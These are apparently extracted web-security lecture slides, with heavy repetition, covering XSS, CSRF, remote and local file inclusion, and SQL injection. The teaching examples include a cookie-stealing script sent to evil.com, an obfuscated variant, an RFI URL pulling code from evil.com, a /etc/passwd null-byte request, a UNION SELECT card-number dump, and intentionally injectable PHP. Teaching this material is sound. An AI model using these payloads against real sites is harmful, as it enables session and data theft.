![Page 124: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/124.jpg)
Cross-Site Scripting (XSS) — Nonpersistent
Search results for "panda" is ...
www.site.com
<a href="http://site.com/search.php?query=panda">See cute pandas here!!!
</a>
www.pandas.com
Click!
Attacks on Clients 52/79
![Page 125: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/125.jpg)
Cross-Site Scripting (XSS) — Nonpersistent
<a href=http://site.com/search.php?query=
www.site.com
Click!
www.pandas.com
<script> document.location= "http://evil.com/steal.php?cookie="+ document.cookie </script>>
</a>See cute pandas here!
Attacks on Clients 52/79
![Page 126: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/126.jpg)
Cross-Site Scripting (XSS) — Nonpersistent
<a href=http://site.com/search.php?query=
www.site.com
Click!
www.pandas.com
<script> document.location= "http://evil.com/steal.php?cookie="+ document.cookie </script>>
</a>See cute pandas here!
Attacks on Clients 52/79
![Page 127: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/127.jpg)
Cross-Site Scripting (XSS) — Nonpersistent
<a href=http://site.com/search.php?query=
www.site.com
Click!
Search results for is ...
www.pandas.com
<script> document.location= "http://evil.com/steal.php?cookie="+ document.cookie </script>>
</a>See cute pandas here!
Attacks on Clients 52/79
![Page 128: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/128.jpg)
Cross-Site Scripting (XSS) — Nonpersistent
<a href=http://site.com/search.php?query=
www.site.com
Click!
Search results for is ...
www.pandas.com
<script> document.location= "http://evil.com/steal.php?cookie="+ document.cookie </script>>
</a>See cute pandas here!
Attacks on Clients 52/79
![Page 129: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/129.jpg)
Cross-Site Scripting — Countermeasures
Programmers must sanitize all inputs:
Strip out all <script> tags!
Users can disable client-side scripts.
Firefox NoScript XSS detection sanitizes GET/POST variables:
remove quotes, double quotes, brackets.
Attacks on Clients 53/79
![Page 130: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/130.jpg)
Cross-Site Scripting — Counter-Countermeasures
Evade filtering by obfuscating GET requests usingURL encoding .
This request✞ ☎
<s c r i p t>a l e r t ( ’ h e l l o ’ );</ s c r i p t>✝ ✆
turns into✞ ☎
%3Cs c r i p t%3E a l e r t%28%27 h e l l o%27%29%3B%3C%2F s c r i p t%3E✝ ✆
Attacks on Clients 54/79
![Page 131: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/131.jpg)
Cross-Site Scripting — Counter-Countermeasures. . .
Obfuscate the script to avoid detection:✞ ☎
<s c r i p t >a = document . c ook i e ;b = ” tp ” ;c = ” ht ” ;d = ” :// ” ;e = ”ww” ;f = ”w. ” ;g = ” v i c ” ;h = ” t im” ;i = ” . c” ;j = ”om/ s e a r c h . p” ;k = ”hp?q=” ;document . l o c a t i o n=b+c+d+e+f+g+h+i+j+k+a ;
</ s c r i p t >✝ ✆
Attacks on Clients 55/79
![Page 132: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/132.jpg)
Cross-Site Request Forgery (CSRF)
Basic idea:1 Alice has an account with www.bob.com.
Attacks on Clients 56/79
![Page 133: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/133.jpg)
Cross-Site Request Forgery (CSRF)
Basic idea:1 Alice has an account with www.bob.com.2 www.bob.com trusts Alice.
Attacks on Clients 56/79
![Page 134: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/134.jpg)
Cross-Site Request Forgery (CSRF)
Basic idea:1 Alice has an account with www.bob.com.2 www.bob.com trusts Alice.3 Alice is authenticated with www.bob.com (through an active
cookie, for example).
Attacks on Clients 56/79
![Page 135: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/135.jpg)
Cross-Site Request Forgery (CSRF)
Basic idea:1 Alice has an account with www.bob.com.2 www.bob.com trusts Alice.3 Alice is authenticated with www.bob.com (through an active
cookie, for example).4 Alice vists a site www.evil.com.
Attacks on Clients 56/79
![Page 136: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/136.jpg)
Cross-Site Request Forgery (CSRF)
Basic idea:1 Alice has an account with www.bob.com.2 www.bob.com trusts Alice.3 Alice is authenticated with www.bob.com (through an active
cookie, for example).4 Alice vists a site www.evil.com.5 www.evil.com executes a malicious script on www.bob.com
(who thinks he’s talking to Alice!).
Attacks on Clients 56/79
![Page 137: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/137.jpg)
Cross-Site Request Forgery (CSRF)
Basic idea:1 Alice has an account with www.bob.com.2 www.bob.com trusts Alice.3 Alice is authenticated with www.bob.com (through an active
cookie, for example).4 Alice vists a site www.evil.com.5 www.evil.com executes a malicious script on www.bob.com
(who thinks he’s talking to Alice!).
Attacks on Clients 56/79
![Page 138: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/138.jpg)
Cross-Site Request Forgery (CSRF)
Basic idea:1 Alice has an account with www.bob.com.2 www.bob.com trusts Alice.3 Alice is authenticated with www.bob.com (through an active
cookie, for example).4 Alice vists a site www.evil.com.5 www.evil.com executes a malicious script on www.bob.com
(who thinks he’s talking to Alice!).
I.e. in a CSRF attack a website executes commands itreceived from a user it trusts.
Attacks on Clients 56/79
![Page 139: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/139.jpg)
Cross-Site Request Forgery (CSRF). . .
Alice is logged into her bank www.bank.com, her authenticationstored in a cookie.
She visits www.evil.com that has this script:✞ ☎
<s c r i p t >document . l o c a t i o n=” h t tp :// bank . com/ t r a n s f e r . php?
amount=1000&from=A l i c e&to=Eve” ;
</ s c r i p t >✝ ✆
Alice’ browser redirects to her bank which executes thetransfer.
Attacks on Clients 57/79
![Page 140: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/140.jpg)
Cross-Site Request Forgery — Login Attack
A malicious website issues cross-site requests on behalf of theuser, but makes the user authenticate as the attacker.
Example:1 Alice orders cookies from evescookies.com.
Attacks on Clients 58/79
![Page 141: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/141.jpg)
Cross-Site Request Forgery — Login Attack
A malicious website issues cross-site requests on behalf of theuser, but makes the user authenticate as the attacker.
Example:1 Alice orders cookies from evescookies.com.2 Alice logs into paypal.com to pay for the cookies.
Attacks on Clients 58/79
![Page 142: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/142.jpg)
Cross-Site Request Forgery — Login Attack
A malicious website issues cross-site requests on behalf of theuser, but makes the user authenticate as the attacker.
Example:1 Alice orders cookies from evescookies.com.2 Alice logs into paypal.com to pay for the cookies.3 But, Eve has injected code that makes Alice authenticate to
PayPal as Eve.
Attacks on Clients 58/79
![Page 143: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/143.jpg)
Cross-Site Request Forgery — Login Attack
A malicious website issues cross-site requests on behalf of theuser, but makes the user authenticate as the attacker.
Example:1 Alice orders cookies from evescookies.com.2 Alice logs into paypal.com to pay for the cookies.3 But, Eve has injected code that makes Alice authenticate to
PayPal as Eve.4 Alice gives paypal.com her credit card number.
Attacks on Clients 58/79
![Page 144: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/144.jpg)
Cross-Site Request Forgery — Login Attack
A malicious website issues cross-site requests on behalf of theuser, but makes the user authenticate as the attacker.
Example:1 Alice orders cookies from evescookies.com.2 Alice logs into paypal.com to pay for the cookies.3 But, Eve has injected code that makes Alice authenticate to
PayPal as Eve.4 Alice gives paypal.com her credit card number.5 Eve logs in to paypal.com to collect Alice’s credit card
number.
Attacks on Clients 58/79
![Page 145: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/145.jpg)
Cross-Site Request Forgery — Login Attack. . .
evescookies.com paypal.com
Alice
![Page 146: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/146.jpg)
Cross-Site Request Forgery — Login Attack. . .
evescookies.com paypal.com
Alice
buy
cookies!
![Page 147: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/147.jpg)
Cross-Site Request Forgery — Login Attack. . .
evescookies.com paypal.com
Alice
script:user=eve,pw=cookies
![Page 148: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/148.jpg)
Cross-Site Request Forgery — Login Attack. . .
evescookies.com paypal.com
Alice
payforcookies!
![Page 149: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/149.jpg)
Cross-Site Request Forgery — Login Attack. . .
evescookies.com paypal.com
Alice
login:user=eve,pw=cookies
![Page 150: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/150.jpg)
Cross-Site Request Forgery — Login Attack. . .
evescookies.com paypal.com
Alice
VISA=4750...
![Page 151: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/151.jpg)
Cross-Site Request Forgery — Login Attack. . .
evescookies.com paypal.com
Alice
login
![Page 152: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/152.jpg)
Cross-Site Request Forgery — Login Attack. . .
evescookies.com paypal.com
Alice
VISA=4750...
Attacks on Clients 59/79
![Page 153: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/153.jpg)
Outline
1 Introduction2 HTTPS3 Dynamic Content
DOM TreeSessions and Cookies
4 Attacks on ClientsSession HijackingClick-JackingPrivacy AttacksXSSCSRF
5 Attacks on ServersPHPFile InclusionSQL Injection Attacks
6 Summary
Attacks on Servers 60/79
![Page 154: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/154.jpg)
Attacks on Servers
Server-side scripts execute code on the server to generatedynamic pages.
Written in php, perl, Java Servlets, . . . .
Access databases, . . . .
Attacks on Servers 61/79
![Page 155: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/155.jpg)
Generating Dynamic Content
Alice
php
mysql
![Page 156: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/156.jpg)
Generating Dynamic Content
Alice
php
mysql
connect
![Page 157: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/157.jpg)
Generating Dynamic Content
Alice
php
mysql
<html>...</html>
![Page 158: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/158.jpg)
Generating Dynamic Content
Alice
php
mysql
name=Alice,pw=love
![Page 159: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/159.jpg)
Generating Dynamic Content
Alice
php
mysql
name=Alice,pw=love
![Page 160: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/160.jpg)
Generating Dynamic Content
Alice
php
mysql
SELECT...
![Page 161: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/161.jpg)
Generating Dynamic Content
Alice
php
mysql
data
![Page 162: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/162.jpg)
Generating Dynamic Content
Alice
php
mysql
<html>...</html>
![Page 163: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/163.jpg)
Generating Dynamic Content
Alice
php
mysql
<html>...</html>
Attacks on Servers 62/79
![Page 164: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/164.jpg)
PHP
<?php insert code here ?>.
$ GET[variable] — array of GET input variables.
No typing.✞ ☎
<HTML><BODY>
Your number : <?php echo $x=$ GET [ ’ number ’ ] ; ? > .Square i s <?php $y=$x∗$x ; echo $y ; ? > .
</BODY></HTML>✝ ✆
Attacks on Servers 63/79
![Page 165: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/165.jpg)
PHP. . .
Assume the GET variable number is 5, then PHP will generatethis page:
✞ ☎
<HTML><BODY>
Your number : 5 .Square i s 2 5 .
</BODY></HTML>✝ ✆
Attacks on Servers 64/79
![Page 166: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/166.jpg)
Remote File Inclusion (RFI)
Let this be index.php:✞ ☎
<?phpi n c l u d e ( ” header . html” ) ;i n c l u d e ( ”$ GET [ ’ page ’ ] . ” . php” ) ;i n c l u d e ( ” f o o t e r . html” ) ;
?>✝ ✆
A user can go to www.cnn.com/index.php?page=news and a news page isgenerated.An attacker can go to✞ ☎ht tp : // cnn . com/ i ndex . php ? page=http : // e v i l . com/ e v i l c o d e
✝ ✆
forcing the server to include and execute the remote fileevilcode.php.
Most sites now forbid RFI.
Attacks on Servers 65/79
![Page 167: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/167.jpg)
Local File Inclusion (LFI)
As RFI, but a local file gets executed✞ ☎
h t tp : //www. cnn . com/ i n d e x . php? page=se c r e t p a ge✝ ✆
Getting the password file:✞ ☎
h t tp : //www. cnn . com/ i n d e x . php? page=/e t c /passwd%00✝ ✆
%00 is a null byte, effectively removing the .php extension.
Attacks on Servers 66/79
![Page 168: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/168.jpg)
Local File Inclusion (LFI). . .
Attack: The attacker1 uploads a file (a php script hiding as a .jpg file, for example).2 tricks the site to execute the uploaded file using LFI.
Eve
flicker.com
![Page 169: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/169.jpg)
Local File Inclusion (LFI). . .
Attack: The attacker1 uploads a file (a php script hiding as a .jpg file, for example).2 tricks the site to execute the uploaded file using LFI.
Eve
flicker.com
boat.jpg✞ ☎<?php . . . ? >✝ ✆
![Page 170: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/170.jpg)
Local File Inclusion (LFI). . .
Attack: The attacker1 uploads a file (a php script hiding as a .jpg file, for example).2 tricks the site to execute the uploaded file using LFI.
Eve
flicker.com
flicker.com/index.php?page=pics/boat.jpg
Attacks on Servers 67/79
![Page 171: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/171.jpg)
Local File Inclusion (LFI). . .
For example, Jasvir Nagra’s Visualize program
http://search.cpan.org/~jnagra/Perl-Visualize-1.02/Visualize.pm
can embed a perl script into a gif file, so that the file isboth an image and an executable program.
Attacks on Servers 68/79
![Page 172: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/172.jpg)
Accessing a Backend Database
Alice
php
mysql
![Page 173: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/173.jpg)
Accessing a Backend Database
Alice
php
mysql
name=Alice,pw=love
![Page 174: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/174.jpg)
Accessing a Backend Database
Alice
php
mysql
name=Alice,pw=love
![Page 175: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/175.jpg)
Accessing a Backend Database
Alice
php
mysql
SELECT...
![Page 176: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/176.jpg)
Accessing a Backend Database
Alice
php
mysql
data
Attacks on Servers 69/79
![Page 177: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/177.jpg)
SQL tables
SQL databases store records as tables:
id title author body
1 Databases John Story 1
2 Computers Joe Story 2
3 Security Jane Story 3
4 Technology Julia Story 4
Attacks on Servers 70/79
![Page 178: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/178.jpg)
SQL commands
SQL commands for accessing a relational database:
SELECT extract records from tables
INSERT insert new records in a table
UPDATE alter a record in a table
DELETE remove a record in a table
UNION combine the results of multiple queries
Attacks on Servers 71/79
![Page 179: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/179.jpg)
SQL queries
id title author body
1 Databases John Story 1
2 Computers Joe Story 2
3 Security Jane Story 3
4 Technology Julia Story 4
SELECT * FROM news WHERE id = 3
SELECT body FROM news WHERE author = "joe"
Attacks on Servers 72/79
![Page 180: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/180.jpg)
SQL Injection Attack
✞ ☎
<?php$query = ’SELECT ∗ FROM news WHERE id=’ . $ GET [ ’ i d ’ ] ;$out = mysq l que ry ( $query ) ;echo ”<u l>”whi le ( $row = my s q l f e t c h a r r a y ( $out ) ) {
echo ” < l i >” . $row [ ’ i d ’ ] ;echo ” < l i >” . $row [ ’ t i t l e ’ ] ;echo ” < l i >” . $row [ ’ au tho r ’ ] ;echo ” < l i >” . $row [ ’ body ’ ] ;
}echo ”</u l>”
?>✝ ✆
Attacks on Servers 73/79
![Page 181: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/181.jpg)
SQL Injection Attack. . .
Consider this URL:✞ ☎
h t tp : //www. cnn . com/news . php? i d=3✝ ✆
The query would1 extract the 3rd news article,2 generate an HTML page, and3 send it to the user.
Attacks on Servers 74/79
![Page 182: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/182.jpg)
SQL Injection Attack. . .
Consider instead✞ ☎
h t tp : //www. cnn . com/news . php? i d=NULL UNIONSELECT cardno , f i r s t , l a s t , ema i l FROM u s e r s
✝ ✆
Since the PHP code is✞ ☎
<?php$query=’SELECT ∗ FROM news WHERE id=’ . $ GET [ ’ i d ’ ] ;. . .
?>✝ ✆
this would force the server to execute✞ ☎
SELECT ∗ FROM news WHERE id=NULL UNIONSELECT cardno , f i r s t , l a s t , ema i l FROM u s e r s
✝ ✆
revealing all account information.
Attacks on Servers 75/79
